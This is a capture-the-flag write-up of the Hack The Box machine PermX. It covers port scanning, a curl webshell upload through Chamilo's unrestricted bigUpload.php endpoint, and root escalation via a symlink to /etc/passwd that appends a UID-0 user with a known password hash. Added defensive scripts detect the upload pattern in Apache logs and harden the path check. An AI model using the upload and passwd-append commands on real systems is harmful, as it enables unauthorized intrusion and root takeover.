Hack. Eat. Sleep. Repeat!!!
Rustscan’s output
❯ rustscan -a 10.10.11.23 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/home/sensei/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.23:22
Open 10.10.11.23:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p ")
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 10:18 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Initiating Ping Scan at 10:18
Scanning 10.10.11.23 [2 ports]
Completed Ping Scan at 10:18, 0.21s elapsed (1 total hosts)
Initiating Connect Scan at 10:18
Scanning permx.htb (10.10.11.23) [2 ports]
Discovered open port 80/tcp on 10.10.11.23
Discovered open port 22/tcp on 10.10.11.23
Completed Connect Scan at 10:18, 0.21s elapsed (2 total ports)
Initiating Service scan at 10:18
Scanning 2 services on permx.htb (10.10.11.23)
Completed Service scan at 10:18, 6.81s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.23.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 7.61s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 3.17s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Nmap scan report for permx.htb (10.10.11.23)
Host is up, received conn-refused (0.21s latency).
Scanned at 2024-09-03 10:18:10 EDT for 18s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAyYzjPGuVga97Y5vl5BajgMpjiGqUWp23U2DO9Kij5AhK3lyZFq/rroiDu7zYpMTCkFAk0fICBScfnuLHi6NOI=
| 256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP8A41tX6hHpQeDLNhKf2QuBM7kqwhIBXGZ4jiOsbYCI
80/tcp open http syn-ack Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-title: eLEARNING
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.72 seconds
Subdomain enumeration with ffuf spots lms; we don't need to check www, it is just the normal permx.htb page. lms.permx.htb hosts a Chamilo learning management portal. The PHP page /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported allows us to upload any file type, so we can upload a webshell to execute commands.
I uploaded the file with curl
❯ curl -F "bigUploadFile=@<shell filename>" "http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported"
The file has successfully been uploaded.%
The web shell is then reachable at the route /main/inc/lib/javascript/bigupload/files/[filename].
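From the defender's side, the two request shapes in this section (a POST to bigUpload.php with action=post-unsupported, followed by a request for a PHP file under bigupload/files/) stand out clearly in an Apache access log. The following is an added example written for this page, not code from the write-up or from Chamilo; the log lines are constructed, and the client addresses, timestamps and file names in them are made up.

```shell
#!/usr/bin/env bash
# Added example (not from the write-up or Chamilo): flag the upload-then-execute
# pattern in Apache combined-format access logs.

# Paths taken from the write-up. The endpoint accepts any file type when called
# with action=post-unsupported; uploaded files land under the files/ directory.
UPLOAD_ENDPOINT='/main/inc/lib/javascript/bigupload/inc/bigUpload.php'
UPLOAD_DIR='/main/inc/lib/javascript/bigupload/files/'

# flag_upload_abuse  < access.log
# Emits one line per suspicious request: "<kind> <ip> <method> <path>"
#   upload   POST to the bigUpload endpoint with action=post-unsupported
#   execute  any request for a PHP-like file inside the upload directory
flag_upload_abuse() {
    awk -v ep="$UPLOAD_ENDPOINT" -v dir="$UPLOAD_DIR" '
    {
        # Combined format: ip ident user [time] "METHOD path HTTP/x" status bytes "ref" "ua"
        ip = $1
        method = $6; sub(/^"/, "", method)
        path = $7
        if (method == "POST" && index(path, ep) == 1 && path ~ /[?&]action=post-unsupported(&|$)/)
            print "upload", ip, method, path
        else if (index(path, dir) == 1 && path ~ /\.(php[0-9]*|phtml|phar)(\?.*)?$/)
            print "execute", ip, method, path
    }'
}

# count_flagged KIND  < access.log  -> number of flagged lines of that kind (always prints a number)
count_flagged() {
    flag_upload_abuse | awk -v kind="$1" '$1 == kind { n++ } END { print n + 0 }'
}

# Constructed sample log (made-up client, timestamps and file names). It mirrors the
# curl upload from the write-up followed by requests to the dropped file, mixed with
# benign traffic that must not be flagged.
SAMPLE_LOG='10.10.14.5 - - [03/Sep/2024:10:40:01 -0400] "GET /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 312 "-" "curl/8.5.0"
10.10.14.5 - - [03/Sep/2024:10:40:07 -0400] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 41 "-" "curl/8.5.0"
10.10.14.5 - - [03/Sep/2024:10:40:15 -0400] "GET /main/inc/lib/javascript/bigupload/files/shell.php?cmd=id HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.10.14.9 - - [03/Sep/2024:10:41:00 -0400] "GET /main/inc/lib/javascript/bigupload/files/lecture1.pdf HTTP/1.1" 200 88213 "-" "Mozilla/5.0"
10.10.14.9 - - [03/Sep/2024:10:41:03 -0400] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.5 - - [03/Sep/2024:10:42:30 -0400] "GET /main/inc/lib/javascript/bigupload/files/x.phtml HTTP/1.1" 200 1024 "-" "Mozilla/5.0"'

# Stand-alone run: list the hits in the sample, then the totals per kind.
printf '%s\n' "$SAMPLE_LOG" | flag_upload_abuse
printf 'uploads: %s  executes: %s\n' \
    "$(printf '%s\n' "$SAMPLE_LOG" | count_flagged upload)" \
    "$(printf '%s\n' "$SAMPLE_LOG" | count_flagged execute)"
```

Run it as flag_upload_abuse < /var/log/apache2/access.log. A plain GET to the endpoint is not counted as an upload, only the POST is, and an execute hit means the server handed out a script from a directory that should hold nothing but uploaded data; the matching server-side fix is to disable script execution for that directory.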
As user mtz, with the password mtz, I ran sudo -l and noticed a rule that user mtz can run a shell script, /opt/acl.sh, as root without a password. Its usage is acl.sh [user] [perm] [file].
The target file must be in the /home/mtz/* directory and must not contain .. to prevent path traversal:
# $target is the script's third argument, [file]
if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi
Then, this code checks that the path is a file:
# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi
Then, it runs setfacl to grant the given user the requested permissions on the file:
/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
The checks only look at the path string, and -f follows symbolic links, so we can create a symbolic link to /etc/passwd in mtz's directory. After creating the symbolic link and getting write access to /etc/passwd through it, we can edit the file and add a new user entry with UID 0, i.e. root privileges. We append a line with this hash to the passwd symbolic link; you can generate a hash with openssl passwd [password]. This hash's password is password123:
sensei:$1$1YY732V9$Irh.HtaGlscLmIz6SLQgM/:0:0:root:/root:/bin/bash
Editing the passwd file /etc/passwd
You can automate it with this script:
ln -s /etc/passwd ~/passwd
sudo -u root /opt/acl.sh mtz rwx /home/mtz/passwd
echo "sensei:\$1\$1YY732V9\$Irh.HtaGlscLmIz6SLQgM/:0:0:root:/root:/bin/bash" >> /home/mtz/passwd
/usr/bin/echo "enter 'password123'"
su sensei
Access as user sensei
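For the defensive counterpart of the acl.sh walkthrough above, here is an added example, written for this page and not the script from the box, that puts the quoted path check beside a hardened version and runs both against a constructed sandbox. The sandbox layout, the ALLOWED_ROOT variable and the function names are this example's own assumptions; the real /home/mtz and /etc/passwd are never touched, and the setfacl call itself is left out because only the validation is at issue.

```shell
#!/usr/bin/env bash
# Added example (not the script from the box): the path check quoted from
# /opt/acl.sh next to a hardened rewrite, exercised on a throwaway sandbox
# instead of the real /home/mtz and /etc/passwd. ALLOWED_ROOT is an assumption
# of this example so the sandbox can stand in for /home/mtz.
ALLOWED_ROOT="${ALLOWED_ROOT:-/home/mtz}"

# original_check PATH
# The acl.sh logic as quoted above, with the bash [[ ]] glob test written as a
# case statement. Both tests look at the path *string*; [ -f ] then follows
# symlinks, so a link that points outside the tree is accepted.
original_check() {
    local target="$1"
    case "$target" in
        "$ALLOWED_ROOT"/*) ;;                        # must start with the prefix
        *) echo "Access denied." >&2; return 1 ;;
    esac
    case "$target" in
        *..*) echo "Access denied." >&2; return 1 ;; # no ".." anywhere in it
    esac
    if [ ! -f "$target" ]; then
        echo "Target must be a file." >&2
        return 1
    fi
}

# hardened_check PATH
# Refuse a symlink argument, resolve the rest of the path (symlinked parent
# directories and ".." included), compare the *resolved* target against the
# *resolved* root, and only then require a regular file. On success the
# canonical path is printed so the caller hands exactly that to setfacl.
hardened_check() {
    local target="$1" root real
    if [ -L "$target" ]; then                        # 1. the link itself
        echo "Access denied: symbolic links are not allowed." >&2
        return 1
    fi
    root=$(realpath -e -- "$ALLOWED_ROOT") || {      # 2. canonicalise both sides
        echo "Allowed root does not exist." >&2; return 1; }
    real=$(realpath -e -- "$target" 2>/dev/null) || {
        echo "Target must exist." >&2; return 1; }
    case "$real" in                                  # 3. containment on the resolved path
        "$root"/*) ;;
        *) echo "Access denied." >&2; return 1 ;;
    esac
    if [ ! -f "$real" ]; then                        # 4. regular file only
        echo "Target must be a file." >&2
        return 1
    fi
    printf '%s\n' "$real"
}

# make_sandbox
# Constructed tree standing in for the box: etc/passwd is a stand-in file,
# home/mtz holds a harmless file, the write-up's passwd -> etc/passwd link,
# and a symlinked directory, which the ".." filter never sees.
make_sandbox() {
    local tmp
    tmp=$(mktemp -d)
    mkdir -p "$tmp/etc" "$tmp/home/mtz"
    echo "root:x:0:0:root:/root:/bin/bash" > "$tmp/etc/passwd"   # stand-in content
    echo "harmless notes" > "$tmp/home/mtz/notes.txt"
    ln -s "$tmp/etc/passwd" "$tmp/home/mtz/passwd"
    ln -s "$tmp/etc" "$tmp/home/mtz/etc_link"
    printf '%s\n' "$tmp"
}

# Stand-alone demo: which paths does each check let through?
demo() {
    local tmp p
    tmp=$(make_sandbox)
    ALLOWED_ROOT="$tmp/home/mtz"
    for p in notes.txt passwd etc_link/passwd; do
        printf '%-16s original: ' "$p"
        if original_check "$tmp/home/mtz/$p" 2>/dev/null; then printf 'allowed  '; else printf 'denied   '; fi
        if hardened_check "$tmp/home/mtz/$p" >/dev/null 2>&1; then echo 'hardened: allowed'; else echo 'hardened: denied'; fi
    done
    rm -rf "$tmp"
}
demo
```

The demo shows the original test accepting both the passwd link and a file reached through a symlinked directory, while the hardened test accepts only the real file under the tree. The same principle applies to the real script: resolve first, decide second, and pass setfacl the canonical path. A check-then-use window still remains between the test and the setfacl call, so running setfacl with -P (physical mode, which skips symbolic-link arguments) is a cheap second line of defence.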